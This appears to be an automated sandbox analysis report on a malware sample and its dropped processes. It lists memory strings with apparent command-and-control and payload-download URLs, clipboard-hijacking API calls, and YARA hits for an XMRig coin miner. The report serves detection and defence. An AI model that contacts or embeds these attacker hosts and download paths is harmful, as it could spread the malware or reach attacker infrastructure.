                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:59:00 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: newtpp.exe, 00000000.00000002.1685665277.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, newtpp.exe, 00000000.00000000.1644877730.0000000000410000.00000002.00000001.01000000.00000003.sdmp, newtpp.exe, 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmp, sysnldcvmr.exe, 00000001.00000000.1675357252.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000000.1789582363.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://185.215.113.66/
                  Source: sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000625000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.0000000000641000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                  Source: sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/16G-
                  Source: sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1:G)
                  Source: sysnldcvmr.exe, 00000001.00000003.1757912131.000000000064E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757590248.000000000064E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1C:
                  Source: sysnldcvmr.exe, 00000001.00000003.1757590248.0000000000641000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000003.1757912131.0000000000640000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1~
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2m
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3:
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3=
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000673000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4G
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4JJC:
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000673000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5j
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5rosoft
                  Source: newtpp.exe, 00000000.00000002.1685665277.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, newtpp.exe, 00000000.00000000.1644877730.0000000000410000.00000002.00000001.01000000.00000003.sdmp, newtpp.exe, 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmp, sysnldcvmr.exe, 00000001.00000000.1675357252.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000000.1789582363.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
                  Source: 191563587.exeString found in binary or memory: http://185.215.113.66/tcoin.php?s=%s
                  Source: sysnldcvmr.exe, 00000001.00000003.2024730784.0000000004571000.00000004.00000020.00020000.00000000.sdmp, 191563587.exe, 00000010.00000000.2044938619.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmp, 191563587.exe, 00000010.00000002.4115329354.0000000000AF3000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://185.215.113.66/tcoin.php?s=%sMozilla/5.0
                  Source: 2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/B
                  Source: 2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmp, 2736615137.exe, 0000000B.00000002.2023976839.000000000109A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe
                  Source: 2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe?
                  Source: sysnldcvmr.exe, 00000001.00000003.2024746247.000000000219C000.00000004.00000020.00020000.00000000.sdmp, 2736615137.exe, 0000000B.00000002.2023906645.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, 2736615137.exe, 0000000B.00000000.1874143272.0000000000D92000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeP0
                  Source: 2736615137.exe, 0000000B.00000002.2023976839.00000000010D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeystem32
                  Source: newtpp.exe, 00000000.00000002.1685665277.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, newtpp.exe, 00000000.00000000.1644877730.0000000000410000.00000002.00000001.01000000.00000003.sdmp, newtpp.exe, 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmp, sysnldcvmr.exe, 00000001.00000000.1675357252.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000001.00000002.4115256458.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000000.1789582363.0000000000410000.00000002.00000001.01000000.00000004.sdmp, sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://91.202.233.141/
                  Source: 204078699.exe, 0000000E.00000002.1994989301.0000000000D11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/$
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2#
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2/
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/27
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2j
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2t
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/3
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/37
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/4
                  Source: sysnldcvmr.exe, 00000001.00000002.4115689920.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/5
                  Source: 204078699.exe, 0000000E.00000002.1994989301.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/IBSTSWSONL
                  Source: 204078699.exe, 0000000E.00000002.1994989301.0000000000CFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/IBSTSWSONLM
                  Source: 204078699.exe, 0000000E.00000000.1959011448.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, 204078699.exe, 0000000E.00000002.1994803487.0000000000572000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://91.202.233.141/IBSTSWSONLMozilla/5.0
                  Source: 204078699.exe, 0000000E.00000002.1994989301.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/IBSTSWSONLe
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                  Source: powershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000016.00000002.2297923755.00000236922E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmp, powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: sysnldcvmr.exe, 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B75E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: powershell.exe, 00000016.00000002.2297923755.00000236922E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000011.00000002.2158827753.00000126CFCEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.Z
                  Source: powershell.exe, 00000011.00000002.2158827753.00000126CFCEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B75E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000011.00000002.2120710766.00000126B7809000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                  Source: powershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000016.00000002.2297923755.00000236922E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000011.00000002.2149957410.00000126C7650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: winupsecvmgr.exe, 00000015.00000002.2592219686.00007FF7A2DEB000.00000004.00000001.01000000.0000000F.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405970
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00404970
                  Source: C:\Windows\sysnldcvmr.exeCode function: 1_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00404970
                  Source: C:\Windows\sysnldcvmr.exeCode function: 2_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00404970
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405970
                  Source: C:\Users\user\Desktop\newtpp.exeCode function: 0_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,0_2_00405970

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 31.2.winupsecvmgr.exe.7ff7a2e10320.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e10320.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 21.2.winupsecvmgr.exe.7ff7a2e0ca40.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                  Source: 31.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                  Source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                  Source: 21.2.winupsecvmgr.exe.7ff7a2dd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
